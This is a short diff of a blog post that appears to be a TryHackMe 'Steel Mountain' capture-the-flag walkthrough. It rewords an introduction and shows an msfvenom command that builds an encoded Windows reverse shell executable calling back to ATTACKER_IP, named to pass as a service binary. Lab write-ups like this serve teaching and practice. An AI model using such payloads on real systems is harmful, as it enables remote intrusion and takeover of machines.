nisforrnicholas/nisforrnicholas.github.io/tryhackme/_posts/2020-09-10-steel_mountain.md

 ### [ Use msfvenom to generate a reverse shell as an Windows executable. ]

-We want to open a reverse shell on the target machine.
-Let's first use `msfvenom` to generate the Windows reverse shell payload:
+Alright, let's open a reverse shell on the target machine.

+To do so, we first use `msfvenom` to generate a Windows reverse shell payload:

 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe